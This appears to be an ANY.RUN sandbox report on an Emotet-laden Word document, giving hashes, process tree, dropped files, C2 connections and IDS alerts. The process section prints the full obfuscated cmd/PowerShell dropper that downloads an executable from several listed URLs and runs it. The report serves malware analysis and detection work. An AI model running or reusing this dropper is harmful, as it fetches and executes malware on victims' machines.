analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2019_Januar_4659856783.doc

Full analysis: https://app.any.run/tasks/87595df1-bfbc-4c84-a6fb-2e18ea74691c
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: January 18, 2019, 10:19:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
emotet
feodo
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

9D74F8C600B8EA13123E6B8451EA594E

SHA1:

235458A6D89957863D7A6EFFFBD3DB0A9C0CC2BA

SHA256:

D88ECC25B98D0BC09ED2C7D3E789905CE8AA7B2339A5ECDB6C0B7034CA1B2102

SSDEEP:

3072:jDX920f/bSvGff0dvqr+/iNKDzaJFUKc0UTE7yZRUV7RJeOzi8E:d2KS+RSaEDzYUTE7yZRVUi8E

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3624)

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3624)

    • Application was dropped or rewritten from another process

      • 977.exe (PID: 3156)
      • 977.exe (PID: 1832)
      • wabmetagen.exe (PID: 3988)
      • wabmetagen.exe (PID: 3456)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 3228)

    • EMOTET was detected

      • wabmetagen.exe (PID: 3988)

    • Connects to CnC server

      • wabmetagen.exe (PID: 3988)

    • Changes the autorun value in the registry

      • wabmetagen.exe (PID: 3988)

  • SUSPICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2640)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3228)
      • 977.exe (PID: 1832)

    • Creates files in the user directory

      • powershell.exe (PID: 3228)

    • Starts itself from another location

      • 977.exe (PID: 1832)

    • Connects to unusual port

      • wabmetagen.exe (PID: 3988)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3624)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3624)

    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 3228)
      • 977.exe (PID: 1832)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentMacrosPresent: yes
WordDocumentEmbeddedObjPresent: no
WordDocumentOcxPresent: no
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentDocumentPropertiesRevision: 1
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesCreated: 2019:01:18 06:57:00Z
WordDocumentDocumentPropertiesLastSaved: 2019:01:18 06:57:00Z
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesWords: 12
WordDocumentDocumentPropertiesCharacters: 73
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesCharactersWithSpaces: 84
WordDocumentDocumentPropertiesVersion: 16
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesStyleType: paragraph
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentDocSuppDataBinData: (Binary data 65916 bytes, use -b option to extract)
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentDocPrViewVal: print
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 003E487C
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentBodySectPRsidRDefault: 003E487C
WordDocumentBodySectPRRsidRPr: 00B901C0
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictBinData: (Binary data 111550 bytes, use -b option to extract)
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:115.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRT:
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrDocGridLine-pitch: 360
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
4
Suspicious processes
3

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 977.exe no specs 977.exe wabmetagen.exe no specs #EMOTET wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
3624"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2019_Januar_4659856783.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2640c:\FantasticPlasticBallhn28\Intelligentv66\Takaj42\..\..\..\windows\system32\cmd.exe /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $MalaysianRinggitv64='Drivesp88';$Avonuw65=new-object Net.WebClient;$ArmenianDramp86='http://easyaccesshs.com/WYPsCYUe_89F0oV@http://dowseservices.com/Cna7kt_HtIAD2LqT_rXDH9b@http://www.immo-en-israel.com/mP7mhva_1xVx_6tOstw7@http://www.giancarlopuppo.com/tmp/3JBXN3_NmitWLk37_trb2wuQ@http://kcpaving.co.za/vTzd_4jLXhB6AV'.Split('@');$Woodenzv78='abilityak36';$Nevadaoq74 = '977';$Bedfordshiref76='Concretek63';$yellowz96=$env:public+'\'+$Nevadaoq74+'.exe';foreach($Omanp5 in $ArmenianDramp86){try{$Avonuw65.DownloadFile($Omanp5, $yellowz96);$Buckinghamshireqh53='arrayli8';If ((Get-Item $yellowz96).length -ge 80000) {Invoke-Item $yellowz96;$Skyways98='AutomotiveSportsmp23';break;}}catch{}}$WestVirginiaz96='IncredibleFreshShoesp44';c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3228powershell $MalaysianRinggitv64='Drivesp88';$Avonuw65=new-object Net.WebClient;$ArmenianDramp86='http://easyaccesshs.com/WYPsCYUe_89F0oV@http://dowseservices.com/Cna7kt_HtIAD2LqT_rXDH9b@http://www.immo-en-israel.com/mP7mhva_1xVx_6tOstw7@http://www.giancarlopuppo.com/tmp/3JBXN3_NmitWLk37_trb2wuQ@http://kcpaving.co.za/vTzd_4jLXhB6AV'.Split('@');$Woodenzv78='abilityak36';$Nevadaoq74 = '977';$Bedfordshiref76='Concretek63';$yellowz96=$env:public+'\'+$Nevadaoq74+'.exe';foreach($Omanp5 in $ArmenianDramp86){try{$Avonuw65.DownloadFile($Omanp5, $yellowz96);$Buckinghamshireqh53='arrayli8';If ((Get-Item $yellowz96).length -ge 80000) {Invoke-Item $yellowz96;$Skyways98='AutomotiveSportsmp23';break;}}catch{}}$WestVirginiaz96='IncredibleFreshShoesp44';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3156"C:\Users\Public\977.exe" C:\Users\Public\977.exepowershell.exe
User:
admin
Company:
Networks Associates Technology, Inc
Integrity Level:
MEDIUM
Description:
McAfee VirusScan Welcome Resource
Exit code:
0
Version:
8, 0, 0, 26
1832"C:\Users\Public\977.exe"C:\Users\Public\977.exe
977.exe
User:
admin
Company:
Networks Associates Technology, Inc
Integrity Level:
MEDIUM
Description:
McAfee VirusScan Welcome Resource
Exit code:
0
Version:
8, 0, 0, 26
3456"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe977.exe
User:
admin
Company:
Networks Associates Technology, Inc
Integrity Level:
MEDIUM
Description:
McAfee VirusScan Welcome Resource
Exit code:
0
Version:
8, 0, 0, 26
3988"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Networks Associates Technology, Inc
Integrity Level:
MEDIUM
Description:
McAfee VirusScan Welcome Resource
Version:
8, 0, 0, 26
Total events
1 509
Read events
1 083
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
1
Unknown types
2

Dropped files

PID
Process
Filename
Type
3624WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8BBB.tmp.cvr
MD5:
SHA256:
3228powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J4P9RHLW9HD5DSDQ3T7C.temp
MD5:
SHA256:
3624WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1A862A36-C383-4CFC-BD6C-ACB6A08BBABA}.tmp
MD5:
SHA256:
3624WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E9B5C50B-96A0-41DB-8BB7-089D393CEB15}.tmp
MD5:
SHA256:
3624WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4E38AADE-24F0-47FD-92E6-4FDF3F4D1A9B}.tmp
MD5:
SHA256:
3624WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F8B313C273380B644EB92883C0F36F50
SHA256:FFD351840C25693936FC2715FD07D74E21545B68153873C345BAE7E90DCA6001
3228powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3228powershell.exeC:\Users\Public\977.exeexecutable
MD5:59DEC5B309F882BD3B7B7F4DB9DE8810
SHA256:7A9634E16BFA0016F7AACC3586EFA42E7D1D1193A2F56428C6D873AA573F4009
3228powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1998cb.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
1832977.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:59DEC5B309F882BD3B7B7F4DB9DE8810
SHA256:7A9634E16BFA0016F7AACC3586EFA42E7D1D1193A2F56428C6D873AA573F4009
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3988
wabmetagen.exe
GET
190.138.221.70:53
http://190.138.221.70:53/
AR
malicious
3228
powershell.exe
GET
301
129.232.138.186:80
http://easyaccesshs.com/WYPsCYUe_89F0oV
ZA
html
314 b
suspicious
3228
powershell.exe
GET
200
129.232.138.186:80
http://easyaccesshs.com/WYPsCYUe_89F0oV/
ZA
executable
340 Kb
suspicious
3988
wabmetagen.exe
GET
186.67.88.242:465
http://186.67.88.242:465/
CL
suspicious
3988
wabmetagen.exe
GET
200
59.102.162.246:995
http://59.102.162.246:995/
TW
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3228
powershell.exe
129.232.138.186:80
easyaccesshs.com
HETZNER
ZA
suspicious
3988
wabmetagen.exe
189.129.160.167:20
Uninet S.A. de C.V.
MX
malicious
3988
wabmetagen.exe
190.138.221.70:53
Telecom Argentina S.A.
AR
malicious
3988
wabmetagen.exe
59.102.162.246:995
TBC
TW
malicious
3988
wabmetagen.exe
186.67.88.242:465
ENTEL CHILE S.A.
CL
suspicious

DNS requests

Domain
IP
Reputation
easyaccesshs.com
  • 129.232.138.186
suspicious

Threats

PID
Process
Class
Message
3228
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3228
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3228
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3988
wabmetagen.exe
A Network Trojan was detected
ET TROJAN HTTP GET Request on port 53 - Very Likely Hostile
3988
wabmetagen.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3988
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3988
wabmetagen.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3988
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3988
wabmetagen.exe
A Network Trojan was detected
SC SPYWARE Trojan-Banker.Win32.Emotet
3988
wabmetagen.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
2019_Januar_4659856783.doc